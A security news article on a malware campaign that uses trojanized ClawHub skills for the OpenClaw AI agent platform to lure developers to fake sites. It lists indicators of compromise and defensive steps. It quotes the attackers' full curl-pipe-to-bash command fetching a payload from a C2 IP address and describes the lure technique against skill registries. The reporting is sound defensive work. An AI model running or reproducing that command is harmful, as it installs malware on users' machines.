.webp "ClawHub Skills to Bypass VirusTotal Detections via Social Engineering")
They uncovered a sophisticated campaign where attackers use over 40 trojanized ClawHub skills to trick developers into downloading malware from fake websites, evading builtin VirusTotal scans.
This shift from embedding malicious code directly in skill files to pure social engineering lures marks a clever adaptation by threat actors targeting the OpenClaw AI ecosystem.
Attack Evolution
Attackers previously hid base64encoded payloads, like curl/bash commands, inside SKILL.md files, which scanners easily flagged due to telltale strings such as “L2Jpbi9iYXNoIC1jICIkKGN1cmw=.”
Now, these files contain only benign documentation for tools like SEO optimizers or Telegram bots, with a single deceptive line: a warning that users must install “OpenClawCLI” from a malicious site like openclawcli.vercel.app before proceeding.
This keeps the SKILL.md clean, passing ClawHub’s VirusTotal integration, which embeds scan reports on skill pages and flags suspicious ones but not these.
The technique exploits ClawHub’s recent security addition, implemented swiftly by the OpenClaw team, yet proves insufficient against off-platform payloads.
Key Campaigns Uncovered
The primary operation stems from the thiagoruss0 account, which uploaded 37 skills in a burst, mimicking legitimate integrations for Discord, Jira, Perplexity, and more. A secondary account, stveenli, added three others using the same lure site.
These skills direct users to polished fake pages on Vercel, a trusted host, claiming to offer cross-platform CLI tools.
OpenSourceMalware noted that ClawHub’s GitHub mirror repo (github.com/openclaw/skills) retains removed malicious entries, exposing cloners to risks despite registry takedowns.
Payload Delivery Mechanics
The fake site presents an obfuscated install command: it echoes a setup URL, then decodes base64 to run “/bin/bash -c “$(curl -fsSL http://91.92.242.30/ece0f208u7uqhs6x)””, pulling malware from an IP-based C2 server.
This avoids domain takedowns, DNS logs, and casual checks, granting direct execution.
Vercel took down openclawcli.vercel.app by February 9 after collaboration with researchers. Another lookalike, openclawd.ai, offers downloads that remain benign for now but warrant monitoring.
Implications for AI Ecosystems
This “clean skills, dirty dependencies” model challenges static analysis, scales via dozens of variants for high discovery odds, and leverages plausible deniability.
Skills grant persistent local access file system, networks amplifying supply chain risks in AI agent registries.
Indicators of Compromise
- Skills: bear-notes7mcp, coding-agent9vr, perplexityt9d, youtube37puq (full list ~40).
- URLs: hxxp://openclawcli[.]vercel[.]app/, hxxps://openclawd[.]ai
- C2: 91.92.242.30 (e.g., /ece0f208u7uqhs6x, /tjjae9itarrd3txw)
Defensive Measures
Users should verify prerequisites against official repos, shun random suffixes in skill names, and report to ClawHub, Said ” OpenSourceMalware” .
Teams must scan repos for lure patterns, block the C2 IP, and watch for domain variants. As campaigns persist, dynamic behavioral checks beyond VirusTotal will prove essential for skill platforms.
Site : cybersecuritypath.com
%20(1).webp "Technitium: Self-Hosted DNS Server for Enhanced Privacy and Security")
.webp "Cal.com’s Access Control Mess: How It Let Attackers Hijack Accounts and Dump Millions of Bookings")
